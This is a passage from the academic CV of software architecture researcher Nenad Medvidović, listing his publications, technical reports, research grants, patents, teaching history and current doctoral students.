**C178** **Nenad Medvidović** and David S. Rosenblum. Domains of Concern in Software Architectures and Architecture Description Languages. In Proceedings of the USENIX Conference on Domain-Specific Languages (DSL'97), Santa Barbara, CA, October 1997.

**C179** **Nenad Medvidović** and Richard N. Taylor. A Framework for Classifying and Comparing Architecture Description Languages. In Joint proceedings of the Sixth European Software Engineering Conference together and Fifth ACM SIGSOFT Symposium on the Foundations of Software Engineering (ESEC-FSE'97), Zurich, Switzerland, September 1997.

**C180** **Nenad Medvidović**, Peyman Oreizy, and Richard N. Taylor. Reuse of Off-the-Shelf Components in C2-Style Architectures. In Proceedings of the 1997 Symposium on Software Reusability (SSR'97), Boston, MA, May 1997. Also in Proceedings of the 1997 International Conference on Software Engineering (ICSE'97), Boston, MA, May 1997.

**C181** **Nenad Medvidović** and Richard N. Taylor. Reusing Off-the-Shelf Components to Develop a Family of Applications in the C2 Architectural Style. In Proceedings of the First International Workshop on Software Architectures for Product Families (IW-SAPF-1), Las Navas del Marques, Avila, Spain, November 1996.

**C182** **Nenad Medvidović**, Peyman Oreizy, Jason E. Robbins, and Richard N. Taylor. Using Object-Oriented Typing to Support Architectural Design in the C2 Style. In Proceedings of the Fourth ACM SIGSOFT Symposium on the Foundations of Software Engineering (FSE4),San Francisco, CA, October 1996.

**C183** **Nenad Medvidović**. ADLs and Dynamic Architecture Changes. In Alexander L. Wolf, ed., Proceedings of the Second International Software Architecture Workshop (ISAW-2), San Francisco, CA, October 1996.

**C184** **Nenad Medvidović**, Richard N. Taylor, and E. James Whitehead, Jr. Formal Modeling of Software Architectures at Multiple Levels of Abstraction. In Proceedings of the California Software Symposium 1996, Los Angeles, CA, April 1996.

**C185** Richard N. Taylor, **Nenad Medvidović**, Kenneth M. Anderson, E. James Whitehead Jr. and Jason E. Robbins. A Component- and Message-Based Architectural Style for GUI Software. In Proceedings of the Seventeenth International Conference on Software Engineering (ICSE17),Seattle, WA, April 1995.

Fast-tracked journal publication as one of the best papers of the conference Finalist for the ICSE'95 Most Influential Paper Award

**C186** E. James Whitehead, Jr., Jason E. Robbins, **Nenad Medvidović**, and Richard N. Taylor. Software Architecture: Foundation of a Software Component Marketplace. In Proceedings of the First International Workshop on Architectures for Software Systems (ISAW-1), Seattle, WA, April 1995.

## Refereed Book Chapters

**B1** **Nenad Medvidović** and Alessandro Orso. Software Analytics Under the Lamppost (or What Star Trek Teaches Us About the Importance of Asking the Right Questions). In T. Menzies, L. Williams, and T Zimmermann, eds., *Perspectives on Data Science for Software Engineering*, Morgan Kaufmann, July 2016.

**B2** Chris A. Mattmann, Daniel J. Crichton, Andrew F. Hart, Cameron Goodale, J. Steven Hughes, Sean Kelly, Luca Cinquini, Thomas H. Painter, Joseph Lazio, Duane Waliser, **Nenad Medvidović**, Jinwon Kim, and Peter Lean. Architecting Data-Intensive Systems. In B. Furht and A. Escalante, eds., *Handbook of Data Intensive Computing*, Springer Verlag, 2011.

**B3** Ivo Krka, George Edwards, Leslie Cheung, Leana Golubchik, and **Nenad Medvidović**. A Comprehensive Exploration of Challenges in Architecture-Based Reliability Estimation. In R. de Lemos, J.-C. Fabre, C. Gacek, F. Gadducci, and M. ter Beek, eds., *Architecting Dependable Systems VI*, Springer Verlag, December 2009.

**B4** Sam Malek, Nels Beckman, Marija Mikic-Rakic, and **Nenad Medvidović**. A Framework for Ensuring and Improving Dependability in Highly Distributed Systems. In R. de Lemos, et al., eds., *Architecting Dependable Systems III*, Springer Verlag, October 2005.

**B5** Paris Avgeriou, Nicolas Guelfi, and **Nenad Medvidović**. Software Architecture Description and UML. In N. J. Nunes, B. Selic, A. Rodrigues da Silva, eds., *UML Modeling Languages and Applications*, LNCS 3297, Springer Verlag, February 2005.

**B6** Roshanak Roshandel and **Nenad Medvidović**. Multi-View Software Component Modeling for Dependability. In R. de Lemos, C. Gacek, and A. Romanowski, eds., *Architecting Dependable Systems II*, Lecture Notes in Computer Science 3069, Springer Verlag, June 2004.

**B7** **Nenad Medvidović** and Nikunj Mehta. Java Beans and Software Architecture. In Hossein Bidgoli, ed., *The Internet Encyclopedia*, John Wiley & Sons, Inc., vol. 2, December 2003.

**B8** **Nenad Medvidović**, Marija Mikic-Rakic, and Nikunj Mehta. Improving Dependability of Component-Based Systems via Multi-Versioning Connectors. In R. de Lemos, et al., eds., *Architecting Dependable Systems*, Lecture Notes in Computer Science (LNCS 2677), Springer Verlag, August 2003.

## Invited, Weakly Refereed, and Non-Refereed Publications

**I1** **Nenad Medvidović**. Software Engineering Research Trends 1994-2024: Stepping Beyond the Lamppost. *IEEE Transactions on Software Engineering*, vol. 51, no. 3 (March 2025).

**I2** **Nenad Medvidović**, Richard N. Taylor, and Eric M. Dashofy. Software Architecture Description Revisited. *IEEE Transactions on Software Engineering*, vol. 51, no. 3 (March 2025).

**I3** Joshua Garcia, Mehdi Mirakhorli, Lu Xiao, Sam Malek, Rick Kazman, Yuanfang Cai, and **Nenad Medvidović**. SAIN: A Community-Wide Software Architecture Infrastructure. In Proceedings of the 45th IEEE/ACM International Conference on Software Engineering (ICSE 2023), Technical Briefing Track, Melbourne, Australia, May 2023.

**I4** Joshua Garcia, Mehdi Mirakhorli, Lu Xiao, Sam Malek, Rick Kazman, Yuanfang Cai, and **Nenad Medvidović**. SAIN: A Community-Wide Software Architecture Infrastructure. In Proceedings of the 45th IEEE/ACM International Conference on Software Engineering (ICSE 2023), Technical Briefing Track, Melbourne, Australia, May 2023.

**I5** **Nenad Medvidović**. Pains and Gains of Peer Reviewing in Software Engineering: A Journal-Centric Perspective. ACM SIGSOFT Software Engineering Notes, vol. 46, no. 3, July 2021.

**I6** Yixue Zhao and **Nenad Medvidović**. Mobile-App Analysis and Instrumentation Techniques Reimagined with DECREE. In Recognizing and Rewarding Open Science in Software Engineering (ROSE Festival), held at ICSE 2019, Montreal, Canada, May 2019.

**I7** **Nenad Medvidović**. Editorial: State of the Journal. IEEE Transactions on Software Engineering, vol. 45, no. 1, January 2019.

**I8** Hakan Erdogmus, **Nenad Medvidović**, and Frances Paulisch. 50 Years of Software Engineering. IEEE Software, vol. 25, no. 6, November/December 2018.

**I9** Arman Shahbazian, Yuriy Brun, and **Nenad Medvidović**. eQual: Search-Based Software Design Optimization Poster paper. In Proceedings of the 40th International Conference on Software Engineering (ICSE 2018), Gothenburg, Sweden, May 2018.

**I10** Barbora Buhnova, Antonio Vallecillo, **Nenad Medvidović**, Magnus Larsson, Javier López, Jorge Cuellar. Guest editorial to the Special Issue on Component-Based Software Engineering and Software Architecture. Science of Computer Programming, vol. 90, part B, September 2014.

**I11** **Nenad Medvidović** and Chris A. Mattmann. Leveraging Software Architecture to Reconcile the Promise and Reality of Grid Computing. Infosys Technology Roundtable, September 2009. http://www.infosys.com/newsletter/technology-roundtable/web.htm

**I12** Peyman Oreizy, **Nenad Medvidović**, and Richard N. Taylor. Runtime Software Adaptation: Framework, Approaches, and Styles. In Proceedings of the 30th International Conference on Software Engineering (ICSE 2008), follow-on to the Most Influential Paper of ICSE 1998, Leipzig, Germany, May 2008.

**I13** **Nenad Medvidović**. Foreword to Rogerio De Lemos, Cristina Gacek, and Alexander Romanovsky, eds., Architecting Dependable Systems, LNCS 4615, Springer Verlag, 2007.

**I14** Leslie Cheung, Leana Golubchik, **Nenad Medvidović**, and Gaurav Sukhatme. Identifying and Addressing Uncertainty in Architecture-Level Software Reliability Modeling. In Proceedings of the NSF Next Generation Software Program (NSFNGS) Workshop, Long Beach, CA, February 2007.

**I15** **Nenad Medvidović**. Moving Architectural Description from Under the Technology Lamppost. In Proceedings of the 32nd EUROMICRO Conference on Software Engineering and Advanced Applications, Dubrovnik, Croatia, August 2006.

**I13** David Woollard and **Nenad Medvidović**. High Performance Software Architectures: A Connector-Oriented Approach. In Proceedings of the Institute for Software Research Graduate Research Symposium, Irvine, CA, June 2006.

**I16** Somo Banerjee, Leslie Cheung, Leana Golubchik, **Nenad Medvidović**, Roshanak Roshandel, and Gaurav Sukhatme. Engineering Reliability into Hybrid Systems via Rich Design Models: Recent Results and Current Directions. In Proceedings of the NSF Next Generation Software Program (NSFNGS) Workshop, Rhodes Island, Greece, April 2006.

**I17** **Nenad Medvidović**. Software Architectures and Embedded Systems: A Match Made in Heaven? IEEE Software, September-October 2005.

**I18** **Nenad Medvidović** and Vladimir Jakobac. A Focused Approach to Architectural Recovery. In Proceedings of the 7th Ground System Architectures Workshop (GSAW 2003), Manhattan Beach, CA, March 2003.

**I19** **Nenad Medvidović**. Coupling Architectural Discovery and Recovery to Stem Architectural Erosion. Invited paper for the Dagstuhl Workshop on Software Architecture Recovery and Modeling (SWARM), Dagstuhl, Germany, February 2003.

**I20** Andre van der Hoek, Ebru Dincel, and **Nenad Medvidović**. Using Service Utilization Metrics to Assess and Improve Product Line Architectures. In Proceedings of the 6th Ground System Architectures Workshop (GSAW 2002), El Segundo, CA, March 2002.

**I21** Roshanak Roshandel and **Nenad Medvidović**. Static and Dynamic Modeling of Software Architecture. In Proceedings of the 6th Ground System Architectures Workshop (GSAW 2002), El Segundo, CA, March 2002.

**I22** Nikunj R. Mehta, **Nenad Medvidović**, and Sandeep Phadke. Rich Software Interconnections. In Proceedings of the Fourth Ground System Architectures Workshop (GSAW 2000), El Segundo, CA, February 2000.

**I23** **Nenad Medvidović**. Modeling Software Architectures in UML. Invited paper for the Workshop on Software Architectures and the Unified Modeling Language, Rational Software Corporation, Denver, CO, April 1999.

**I24** **Nenad Medvidović**. An Approach to Architecture-Based Software Integration. In Proceedings of the Ground System Architectures Workshop (GSAW 99), El Segundo, CA, March 1999.

**I25** Richard N. Taylor, **Nenad Medvidović**, and Peyman Oreizy. Architectural Implications of Common Operator Interfaces. In Proceedings of the Ground System Architectures Workshop (GSAW 98), El Segundo, CA, February 1998.

**I26** Jeffrey J. Blevins, Deborah L. Dubrow, Nancy Eickelmann, Rebecca Grinter, **Nenad Medvidović**, Ronald Reimer, Jonathan Shaw, Clark S. Turner, and Gary Wong. Report on the Software Project Management Technical Research Review. In Proceedings of the California Software Symposium (CSS'95), Irvine, CA, March 1995.

## Non-Refereed Technical Reports

**N1** Youn Kyu Lee, Ruhollah Shemirani, Jae young Bang, Arman Shahbazian, Gholamreza Safi, and **Nenad Medvidović**. SEALANT: Preventing Inter-Application Attacks in Android. USC Center for Systems and Software Engineering Technical Report, USC-CSSE-2016-601, March 2016.

**N2** Duc M. Le, Pooyan Behnamghader, Joshua Garcia, Daniel Link, Arman Shahbazian, and **Nenad Medvidović**. An Empirical Study of Architectural Change in Open-Source Software Systems. USC Center for Systems and Software Engineering Technical Report, USC-CSSE-2014-509, December 2014.

**N3** Ivo Krka, Yuriy Brun, and **Nenad Medvidović**. Automatically Mining Specifications from Invocation Traces and Method Invariant. USC Center for Systems and Software Engineering Technical Report, USC-CSSE-2013-509, September 2013.

**N4** George Edwards and **Nenad Medvidović**. Model Interpreter Frameworks. USC Center for Systems and Software Engineering Technical Report, USC-CSSE-2009-514, July 2009.

**N5** Yuriy Brun, George Edwards, Jae Young Bang, and **Nenad Medvidović**, Online Reliability Improvement via Smart Redundancy in Systems with Faulty and Untrusted Participants. USC Center for Systems and Software Engineering Technical Report, USC-CSSE-2009- 510, May 2009.

**N6** Yuriy Brun and **Nenad Medvidović**. Preserving Privacy in Distributed Computation via Self-Assembly. USC Center for Systems and Software Engineering Technical Report, USC- CSSE-2008-819, September 2008.

**N7** Yuriy Brun and **Nenad Medvidović**. Discreetly Distributing Computation via Self-Assembly. USC Center for Systems and Software Engineering Technical Report, USC-CSSE-2007-714, April 2007.

**N8** David Woollard, Chris A. Mattmann, and **Nenad Medvidović**. Injecting Software Architectural Constraints into Legacy Scientific Applications. USC Center for Software Engineering Technical Report, USC-CSE-2007-701, January 2007.

**N9** Chiyoung Seo, Sam Malek, and **Nenad Medvidović**. An Energy Consumption Framework for Distributed Java-Based Software Systems. Technical Report USC-CSE-2006-604, Center for Software Engineering, University of Southern California, December 2006.

**N10** Sam Malek, Marija Mikic-Rakic, and **Nenad Medvidović**. A Decentralized Redeployment Algorithm for Improving the Availability of Distributed Systems. Technical Report USC-CSE-2004-506, USC Center for Software Engineering, March 2004.

**N11** Nikunj Mehta and **Nenad Medvidović**. Checking Style Conformance of Software Architectural Compositions. Technical Report USC-CSE-2004-504, USC Center for Software Engineering, February 2004.

**N12** Nikunj Mehta and **Nenad Medvidović**. Composition of Style-Based Software Architectures from Architectural Primitives. Technical Report USC-CSE-2004-503, USC Center for Software Engineering, February 2004.

**N13** Nikunj Mehta and **Nenad Medvidović**. Toward Composition Of Style-Conformant Software Architectures. Technical Report USC-CSE-2004-500, USC Center for Software Engineering, January 2004.

**N14** Marija Mikic-Rakic, Sam Malek, and **Nenad Medvidović**. Improving Availability in Large, Distributed, Component-Based Systems via Redeployment. Technical Report USC-CSE- 2003-515, USC Center for Software Engineering, December 2003.

**N15** Nikunj Mehta and **Nenad Medvidović**. Concise Composition of Architectural Styles from Architectural Primitives. Technical Report USC-CSE-2003-510, USC Center for Software Engineering, October 2003

**N16** Roshanak Roshandel and **Nenad Medvidović**. Relating Software Component Models. Technical Report USC-CSE-2003-504, USC Center for Software Engineering, March 2003.

**N17** Nikunj R. Mehta and **Nenad Medvidović**. Distilling Software Architecture Primitives from Architectural Styles. Technical Report USC-CSE-2002-509, USC Center for Software Engineering, September 2002.

**N18** Marija Mikic-Rakic and **Nenad Medvidović**. Software Architecture-Based Development Support for Ubiquitous Systems. Technical Report USC-CSE-2002-508, USC Center for Software Engineering, September 2002.

**N19** Ebru Dincel, **Nenad Medvidović**, and Andre van der Hoek. An Example Product Line Architecture: The Library System. Technical Report USC-CSE-2002-507, USC Center for Software Engineering, September 2002.

**N20** Ebru Dincel, **Nenad Medvidović**, and Andre van der Hoek. An Example Product Line Architecture: Troops Deployment System. Technical Report USC-CSE-2002-506, USC Center for Software Engineering, September 2002.

**N21** Ebru Dincel, **Nenad Medvidović**, and Andre van der Hoek. An Example Product Line Architecture: Digital Library Projects. Technical Report USC-CSE-2002-505, USC Center for Software Engineering, September 2002.

**N22** Marija Mikic-Rakic, **Nenad Medvidović**, and Vladimir Jakobac. Middleware for Software Architecture-Based Development in Distributed, Mobile, and Resource-Constrained Environments. Technical Report USC-CSE-2002-501, USC Center for Software Engineering, February 2002.

**N23** **Nenad Medvidović** and Marija Mikic-Rakic. Architectural Support for Programming-in-the-Many. Technical Report USC-CSE-2001-506, USC Center for Software Engineering, September 2001.

**N24** Ebru Dincel, Roshanak Roshandel, and **Nenad Medvidović**. ADL-Independent Architectural Representation in XML. Technical Report USC-CSE-00-519, USC Center for Software Engineering, May 2000.

**N25** **Nenad Medvidović**. On the Role of Middleware in Architecture-Based Software Development. Available as Technical Report USC-CSE-00-517, USC Center for Software Engineering, April 2000.

**N26** **Nenad Medvidović**, Peyman Oreizy, Richard N. Taylor, Rohit Khare, and Michael Guntersdorfer. An Architecture-Centered Approach to Software Environment Integration. Technical Report USC-CSE-00-516, USC Center for Software Engineering, March 2000.

**N27** Nikunj R. Mehta, **Nenad Medvidović**, and Marija Rakic. Why Consider Implementation-Level Decisions in Software Architectures? Technical Report USC-CSE-00-514, USC Center for Software Engineering, February 2000.

**N28** Alexander Egyed, Paul Gruenbacher, and **Nenad Medvidović**. Refinement and Evolution Issues between Requirements and Product Line Architectures. Technical Report USC-CSE- 00-515, USC Center for Software Engineering, February 2000.

**N29** **Nenad Medvidović**, David S. Rosenblum, and Richard N. Taylor. A Type Theory for Software Architectures. Technical Report, UCI-ICS-98-14, Department of Information and Computer Science, University of California, Irvine, April 1998.

**N30** **Nenad Medvidović** and Richard N. Taylor. Reuse of Off-the-Shelf Constraint Solvers in C2-Style Architectures. Technical Report UCI-ICS-96-28, Department of Information and Computer Science, University of California, Irvine, July 1996.

**N31** **Nenad Medvidović**. Formal Definition of the Chiron-2 Software Architectural Style. Technical Report UCI-ICS-95-24, Department of Information and Computer Science, University of California, Irvine, August 1995.

**N32** Jason E. Robbins, E. James Whitehead Jr., **Nenad Medvidović**, and Richard N. Taylor. A Software Architecture Design Environment for Chiron-2 Style Architectures. Arcadia Technical Report UCI-95-01, University of California, Irvine, January 1995.

# 7 Research Support

**G1** National Science Foundation — Software and Hardware Foundations
Sole PI at USC; collaborative proposal with Georgia Institute of Technology and UC Irvine
A General Framework for Automated Test Transfer
Duration: 10/1/21 - 9/30/25
Grant Number: 2105871
Award Amount to USC: *$400,000*

**G2** Department of Homeland Security
Sole PI; subcontract to Rochester Institute of Technology
National Vulnerability Intelligence Platform
Duration: 1/1/23 - 10/1/23
Subcontract Amount: *$493,522*
Google Research
Sole PI
Automatic Program Patching and Synthesis
Duration: 5/1/22 - 12/31/23
Award Amount: *$50,000*

**G3** National Science Foundation — Community Infrastructure Planning
Sole PI at USC; lead institution on collaborative proposal with UC Irvine, Rochester Institute of Technology, University of Hawaii,
Drexel University, and Stevens Institute of Technology
Constructing a Community-Wide Software Architecture Infrastructure
Duration: 9/1/18 - 8/31/23
Grant Number: 1823354
Award Amount to USC: *$684,000*

**G4** National Science Foundation — Software and Hardware Foundations
Sole PI
Rooting Out Data- and Control-Flow Anomalies in Event-Based Systems Duration: 8/15/17 - 7/31/22
Grant Number: 1717963
Award Amount: *$500,000*

**G5** Office of Naval Research
Co-PI
Ensuring Security of Android Software via Tailorable Multi-Layer Customization
Co-PIs: Chao Wang, USC (lead PI)
William GJ Halfond, USC
Duration: 9/1/17 - 8/31/21
Grant Number: N00014-17-1-2896
Award Amount: *$1,082,320*

**G6** Google
Sole PI
Mining Architectural Information to Stem Technical Debt
Duration: 10/1/19 - 4/30/21
Award Amount: *$42,500*

**G7** National Science Foundation — Community Infrastructure Planning
Sole PI
Planning and Prototyping a Community-Wide Software Architecture Instrument
Duration: 8/1/16 - 7/31/19
Grant Number: 1629977
Award Amount: *$70,000*

**G8** Huawei Technologies
Sole PI
Advanced Support for Software Architecture Recovery and Maintenance
Duration: 2/15/18 - 2/14/19
Award Amount: *$200,000*

**G9** National Science Foundation — Software and Hardware Foundations
Sole PI
Techniques for Pruning Problem and Solution Spaces to Enable Methodical Exploration of Software Development Alternatives
Duration: 6/1/16 - 5/31/19
Grant Number: 1618231
Award Amount: *$500,000*

**G10** Huawei Technologies
Sole PI
Intelligent Support for Architecture-Based Forward- and Reverse-Engineering
Duration: 12/1/16 - 11/30/17
Award Amount: *$145,000*

**G11** Northrop Grumman
Sole PI
Parametric and Simulation Models Research and Calibration
Duration: 8/16/2014 - 5/15/2017
Award Amount: *$30,000*

**G12** National Science Foundation — Software and Hardware Foundations
Co-PI
Helping Developers Improve the Energy Consumption of Smartphone Applications
Co-PIs: William GJ Halfornd, USC (lead PI)
Ramesh Govindan, USC
Duration: 7/1/13 - 6/30/17
Grant Number: 1321141
Award Amount: *$500,000*

**G13** National Science Foundation — Software and Hardware Foundations
Sole PI
From Scenario-Based Software Requirements to Component-Level Behavior
Duration: 9/01/12 - 8/31/16
Grant Number: 1218115
Award Amount: *$500,000*

**G14** National Science Foundation — Software and Hardware Foundations
Sole PI
Automating the Detection of Architectural Degradation in Software Systems
Duration: 8/01/11 - 7/31/15
Grant Number: 1117593
Award Amount: *$300,000*

**G15** Defense Advanced Research Projects Agency (DARPA)
Lead PI
Testing Privacy-Preserving Distributed Systems on SAFERlab
Co-PIs: Yuriy Brun, University of Massachusetts
Sam Malek, George Mason University
Contract Number: N66001-11-C-4021
Duration: 11/1/13 - 2/28/15
Award Amount: *$300,000*

**G16** Intelligence Advanced Research Projects Activity (IARPA)
Lead PI
OpTile: Private Computing in the Open
Co-PIs: Yuriy Brun, University of Massachusetts
Sam Malek, George Mason University
Contract Number: N66001-13-1-2006
Duration: 9/27/13 - 9/26/14
Award Amount: *$300,000*

**G17** Northrop Grumman
Sole PI
Architectural Transformation of Legacy Systems to Future Systems
Duration: 1/1/14 - 5/15/14
Award Amount: *$30,000*

**G18** Northrop Grumman
Sole PI
Domain-Specific Modeling and Simulation in Collaborative Software Development Projects
Duration: 8/16/13 - 5/15/14
Award Amount: *$10,000*

**G19** Infosys Technologies Ltd.
Sole PI
CoDesign - A Collaborative Software Design Environment
Duration: 10/1/11 - 8/31/14
Award Amount: *$200,000*

**G20** Northrop Grumman
Sole PI
Domain-Specific Modeling and Simulation
Duration: 8/16/12 - 5/15/13
Award Amount: *$10,000*

**G21** Northrop Grumman
Sole PI
Exploring Design Alternatives in Software-Intensive Projects
Duration: 8/16/11 - 5/15/12
Award Amount: *$10,000*

**G22** National Science Foundation — Software and Hardware Foundations
Lead PI
Early Reliability Modeling and Prediction of Embedded Software Systems
Duration: 3/01/10 - 8/31/12
Co-PIs: Leana Golubchik, USC
Gaurav Sukhatme, USC
Grant Number: 0905665
Award Amount: *$210,000*

**G23** Stevens Institute of Technology — Systems Engineering Research Center
Sole PI
Requirements for Net-Centric Enterprises (RT-25)
Duration: 10/1/10 - 12/31/11
Award Amount: *$270,298*

**G24** National Science Foundation — Software for Real-World Systems
Sole PI at USC; collaborative proposal with UC Irvine
Recombinant Services - Recasting the Web for Continuously Evolving Systems
Duration: 9/15/08 - 8/31/11
Grant Number: 0820170
Award Amount to USC: *$193,670*

**G25** Office of Secretary of Defense — UAST
Sole PI; subcontract to MIT
A Prescriptive and Adaptive Testing Framework (PATFrame) for Unmanned and Autonomous Systems of Systems
Duration: 10/1/09 - 9/30/10
Subcontract Amount: *$128,649*

**G26** Infosys Technologies Ltd.
Sole PI
An Extensible Infrastructure for Collaborative Architecture-Based Development of Distributed Software-Intensive Systems
Duration: 9/1/08 - 12/31/10
Grant Number: 0208
Award Amount: *$200,000*

**G27** Jet Propulsion Laboratory — SURP
Co-PI
Reconfigurable Software for Recovering from Component Failures in Long Duration Missions
Co-PIs: Gaurav Sukhatme, USC (co-PI)
Duration: 9/1/09 - 5/31/10
Award Amount: *$75,000*

**G28** National Institutes of Health Co-PI
Mobile Device Biomonitoring to Prevent and Treat Obesity in Underserved Minority Youth
Duration: 8/1/08 - 7/31/10
Co-PIs: Donna Spruijt-Metz, USC (lead PI)
Murali Annavaram, USC
Urbashi Mitra, USC
Shrikanth Narayanan, USC
Gaurav Sukhatme, USC
Award Amount: *$948,348*

**G29** Robert Bosch Research and Technology Centers
Sole PI
Software Architectural Support for Embedded Systems
Duration: 3/1/06 - 5/31/09
Award Amount: *$470,000*

**G30** National Science Foundation — Information Technology Research
Sole PI
Software Architectural Support for Programming-in-the-Small-and-Many
Duration: 9/1/03 - 8/31/09
Grant Number: 0312780
Award Amount: *$448,000*

**G31** National Science Foundation — Computer Systems Research
Lead PI
Engineering Reliability into Hybrid Systems: A Compositional and Hierarchical Approach
Duration: 8/01/07 - 7/31/09
Co-PIs: Leana Golubchik, USC
Grant Number: 0720612
Award Amount: *$40,000*

**G32** U.S. Army
Co-PI
Future Combat Systems Software Definition, Design, Development, and Deployment
Duration: 1/1/08 - 12/31/08
Co-PIs: Barry Boehm (lead PI)
Award Amount: *$425,000*

**G33** IBM Real-Time Innovation
Sole PI
Prism-RT: A Java-Based Architectural Middleware Platform for Real-Time Embedded Systems
Duration: 12/1/2007 - 12/31/08
Award Amount: *$20,000*

**G34** National Science Foundation — Science of Design
Co-PI
Value-Based Science of Design
Duration: 12/15/04 - 11/30/08
Co-PIs: Barry W. Boehm, USC (lead PI)
Grant Number: 0438931
Award Amount: *$400,000*

**G35** National Science Foundation — Computer Systems Research
Lead PI
Engineering Reliability Into Hybrid Systems via Rich Design Models
Duration: 7/1/05 - 6/30/07
Co-PIs: Leana Golubchik, USC
Grant Number: 0509539
Award Amount: *$100,000*

**G36** National Science Foundation — Federal Cyber Service: Scholarship for Service
Co-PI
An Innovative Information Assurance and Security Technology Capacity Development and Outreach Program
Duration: 8/1/04 - 7/31/07
Co-PIs: Leana Golubchik, USC (lead PI)
B. Clifford Neuman, USC
Gerard Medioni, USC
Grant Number: 0417274
Award Amount: *$300,000*

**G37** Okawa Research Foundation
Sole PI
The GridLite DREAM: Bringing the Grid to Your Pocket
Duration: 10/1/05 - 9/30/06
Award Amount: *$10,000*

**G38** Boeing
Sole PI
C4ISR SADD Development Assistance (FCS)
Duration: 10/1/05 - 3/31/06
Award Amount: *$100,000*

**G39** Jet Propulsion Laboratory Sole PI
Software Connectors for Data Distribution
Duration: 7/1/05 - 8/31/05
Award Amount: *$18,144*

**G40** NASA High-Dependability Computing Consortium
Co-PI
Empirical Research on High Dependability Computing
Duration: 4/1/01 - 3/31/06
Co-PIs: Barry W. Boehm, USC (lead PI)
Award Amount: *$2,500,000*

**G41** National Science Foundation — CAREER
Sole PI
Architecture-Based Support for Software Application Families
Duration: 7/1/00 - 6/30/05
Grant Number: 9985441
Award Amount: *$241,000*

**G42** Boeing
Sole PI
Software Architecture-Based Development of Product Lines for the Tactical Radio Domain
Duration: 1/1/04 - 12/31/04
Award Amount: *$57,500*

**G43** Jet Propulsion Laboratory
Sole PI
Extensible Architectural Technology for Managing Complex Space Data Systems
Duration: 11/1/03 - 8/31/04
Contract Number: 579951
Award Amount: *$50,000*

**G44** Defense Advanced Research Projects Agency (DARPA)
Lead PI
Dynamic Assembly, Assessment, Assurance, and Adaptation via Heterogeneous Software Connectors
Duration: 7/1/00 - 10/31/03
Co-PIs: Barry W. Boehm, USC
Contract Number: F30602-00-2-0615
Award Amount: *$460,000*

**G45** Jet Propulsion Laboratory
Sole PI
Relating State-Based and Component/Connector-Based Architectural Styles
Duration: 8/1/00 - 8/31/03
Contract Number: 1219801
Award Amount: *$95,672*

**G46** U.S. Army Tank-Automotive and Armaments Command
Sole PI
COTS Components and Connectors
Duration: 9/1/01 - 3/31/03
Contract Number: 1400508
Award Amount: *$68,350*

**G47** Xerox Corporation
Sole PI
Architecting Application Families
Duration: 9/1/00 - 8/31/02
Award Amount: *$60,000*

**G48** Intel Corporation
Lead PI
Embedded Systems Lab: A Teaching and Research Facility
Award Date: July 2001, July 2002
Co-PIs: Gaurav Sukhatme, USC
Award Amount: *$95,000* (in equipment and cash)

**G49** Defense Advanced Research Projects Agency (DARPA)
Sole PI; subcontract to UC Irvine
Architecture-Centric Dynamic Adaptation of Deeply Networked Embedded Systems
Duration: 9/23/99 - 1/22/01
Contract Number: F30602-99-C-0174
Subcontract Amount: *$92,500*

# 8 Patents

07/2022 Latency Minimization in Mobile Applications
U.S. Patent 11,379,551

11/2020 SEALANT: Security for End-users of Android via Light-weight ANalysis Techniques
U.S. Patent 10,827,349

12/2012 Tile Architectural Style for Privacy-Preserved Distributed Computing
U.S. Patent 8,332,457

# 9 Teaching

## University of Southern California

### Courses Developed and Taught

**T1** CSCI 699 — Software Forensics
Ph.D.-level seminar
Spring 2020

**T2** CSCI 578 — Software Architectures
Graduate-level course, a core course for the M.S. specialization in Software Engineering
Spring 1999, 2000, 2001, 2002, 2004, 2005, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018
Fall 2008, 2009, 2010, 2011, 2012, 2014; 2019, 2020

**T3** CSCI 310 — Software Engineering
Upper-division undergraduate course Spring 2021
Fall 2016, 2017

**T4** CSCI 589 — Software Engineering for Embedded Systems
Graduate-level course
Fall 2001, 2002, 2003, 2004, 2006, 2007, 2015

**T5** CSCI 499 — Modeling Software-Intensive Systems
Upper-division undergraduate / lower-division graduate seminar
Spring 2011

**T6** CSCI 377 — Introduction to Software Engineering
Upper-division undergraduate course
Fall 2004, 2006, 2007, 2008, 2009

**T7** CSCI 599 — Formal Methods in Software Architectures
Graduate seminar
Fall 2000

**T8** CSCI 599 — Current Issues in Software Architectures
Graduate seminar
Fall 1999

### Courses Developed

**T9** CSCI 568 — Requirements Engineering
Graduate-level course, a core course for the Certificate in Software Architecture

### Courses Taught

**T10** CSCI 591 — Computer Science Research Colloquium
M.S.-level research seminar series
Fall 2023

**T11** CSCI 477 — Design and Construction of Large Software Systems
Upper division undergraduate / lower-division graduate course
Spring 2003

## Other Universities

**T12** Mining Software Repositories for Architectural Knowledge
International Summer School on Software Engineering, Salerno, Italy
Graduate, half-day course
July 2017

**T13** Software Architecture and Robotics
LASER Summer School
Advanced graduate, one-week course
September 2017

**T14** Software Architectures
Universidad Politécnica de Madrid, Spain
Graduate, one-week course, part of European Master of Software Engineering program
March 2011

**T15** Advanced Software Architectures
Politecnico di Milano, Italy
Graduate course
July 2010
Two-week course, part of PoliMi's Ph.D. program

**T16** Software Architecture
University of Buenos Aires, Argentina
Graduate, one-week course
Part of UBA's Winter School
August 2009

**T17** NSEN 6111 — Software Architectures
Walden University, USA
Graduate online course
Co-taught with Richard N. Taylor and Eric Dashofy
Spring 2008

## Industry

**T18** Advanced Topics in Software Architecture
Samsung Electronics Co. Ltd., Suwon, South Korea
2-day professional development course
June 2013

**T19** Software Architecture
Samsung Electronics Co. Ltd., Suwon, South Korea
3-day professional development course
June 2013

**T20** Software Architecture
Infosys Technologies Ltd., Mysore, India
3-week professional development course
December 2009

**T21** Software Architectures
Jet Propulsion Laboratory, Pasadena, CA
10-week professional development course
Spring 2001, 2002; Summer 2001, 2002

## Teaching Assistantships

**T22** ICS 121 — Introduction to Software Engineering
Junior/senior-level undergraduate course (Summer 1994)
University of California, Irvine

**T23** ICS 141 — Programming Languages
Junior/senior-level undergraduate course (Spring 1994)
University of California, Irvine

**T24** ICS 52 — Systematic Software Construction
Sophomore-level undergraduate course (Fall 1993, Winter 1994)
University of California, Irvine

**T25** CSE 460/598 — Software Project Management and Development I
Senior-level undergraduate course (Fall 1992, Spring 1993, Summer 1993)
Arizona State University

# 10 Supervised Students

## Current Doctoral Students - Advisor

- Satyaki Das
  Start date: August 2021
- Syeda Tasnim Fabiha
  Start date: August 2022
- Abid Hassan
  Start date: August 2023
- Jincheng He
  Start date: August 2020
- Tuan Ngo
  Start date: August 2023
